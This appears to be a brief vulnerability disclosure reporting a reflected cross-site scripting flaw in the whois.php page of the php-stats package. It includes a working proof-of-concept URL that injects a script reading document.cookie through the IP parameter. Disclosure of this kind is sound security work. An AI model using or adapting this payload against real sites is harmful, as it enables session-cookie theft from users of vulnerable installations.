I have found an xss in whois.php page of php-stats.
http://phpstats.net/
Here is the XSS
php-stats-path/whois.php?IP=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E